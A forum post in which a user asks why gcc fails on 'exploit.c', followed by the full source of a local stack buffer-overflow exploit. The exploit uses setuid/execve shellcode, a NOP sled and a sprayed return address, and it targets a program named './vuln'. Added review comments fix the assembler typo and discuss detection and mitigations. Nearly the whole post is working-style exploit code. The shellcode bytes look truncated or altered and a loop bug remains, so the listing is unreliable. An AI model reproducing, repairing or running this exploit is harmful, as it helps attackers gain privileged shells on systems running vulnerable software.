GCC compiling problem C, SuSE 9.1
downloaded the RPM from ftp.suse.com/pub/suse/i386/9.1/suse/i586
Do you think I need to install more packages? If so, which ones? Or am I just stupid and can't see something obvious?
linux:/home/lxuser/Documents # gcc -o exploit exploit.c
exploit.c:56:2: warning: no newline at end of file
/tmp/cc7LApPc.s: Assembler messages:
/tmp/cc7LApPc.s:16: Error: no such instruction: `mov1 %esp,%eax'
linux:/home/lxuser/Documents #
--------------------------------------------------------------------------------------------------------------
#include <stdlib.h>
/*
 * Machine-code payload kept as a NUL-terminated char array.  main() copies
 * strlen(shellcode) bytes of it into the argument buffer, so only the bytes
 * before the terminator are used; the literal contains no 0x00 byte.
 *
 * Detection note: the bytes 0xcd 0x80 (the 32-bit x86 Linux "int 0x80"
 * system-call instruction) appear twice, and the tail contains the ASCII
 * bytes 2f 62 69 6e 2f 73 ("/bin/s").  Byte runs like these in a command-line
 * argument or an environment string are a useful static indicator.
 *
 * NOTE(review): the array is reproduced exactly as posted and has not been
 * validated here; treat it as opaque data.
 */
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x86";
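/*
 * Return the current stack pointer of the calling process (x86 only).
 *
 * The posted version failed to assemble because "mov1" (digit one) is not an
 * x86 mnemonic; the AT&T-syntax instruction is "movl" (letter l).  It also
 * relied on the value being left in %eax with no return statement, which is
 * undefined behaviour in C.  Here the register is read through an output
 * operand and returned explicitly.
 *
 * The operand is 32 bits wide to match %esp, so on an x86-64 build only the
 * low 32 bits of the stack pointer are returned.
 */
unsigned long sp(void)
{
    unsigned int esp_value;

    /* "=r" lets the compiler pick the destination register. */
    __asm__ volatile("movl %%esp, %0" : "=r"(esp_value));
    return esp_value;
}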
/*
 * Build a 600-byte argument string and hand it to ./vuln through execl().
 *
 * Layout the code is written to produce: the buffer filled with the value
 * `ret`, the first 200 bytes then overwritten with 0x90, the bytes of
 * `shellcode` copied in from offset 200, and a terminating 0 in the last byte.
 *
 * `ret` is derived from this process's own stack pointer, so the listing
 * assumes the stack of ./vuln sits at a similar address and is executable.
 * Address-space layout randomisation and a non-executable stack break both
 * assumptions, and stack protectors detect the overwrite this kind of
 * argument is meant to cause.
 *
 * NOTE(review): only <stdlib.h> is included in the visible listing; printf,
 * strlen and execl are declared in <stdio.h>, <string.h> and <unistd.h>.
 * argc and argv are not used.
 */
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; // offset subtracted from the sampled stack pointer; fixed at 0 here
esp = sp(); // stack pointer of this process, as returned by sp()
ret = esp - offset; // address value written into the buffer below
// NOTE(review): esp and ret are long but are printed with %x, which expects unsigned int
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" offset from esp : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
// NOTE(review): the malloc result is used below without a NULL check
buffer = malloc(600);
// Intended to fill the entire buffer with the ret value, one long at a time
ptr = buffer;
addr_ptr = (long *) ptr;
// NOTE(review): the ';' right after the for header is the whole loop body, so
// the braced statement on the next line runs exactly once, after the loop.
// The i+=4 step also assumes sizeof(long) == 4.
for(i=0; i < 600; i+=4);
{ *(addr_ptr++) = ret; }
// Overwrite the first 200 bytes of the buffer with 0x90 (x86 NOP)
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Copy the shellcode bytes into the buffer starting at offset 200
// (strlen(shellcode) is re-evaluated on every iteration)
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// Terminate the string in the last byte of the buffer
buffer[600-1] = 0;
// Replace this process with ./vuln, passing the buffer as its single argument
// NOTE(review): the variadic terminator is a plain int 0; execl expects (char *)NULL.
// The return value of execl is not checked.
execl("./vuln", "vuln", buffer, 0);
// Reached only if execl fails, since a successful execl does not return
free(buffer);
return 0;
}
--------------------------------------------------------------------------------------------------------------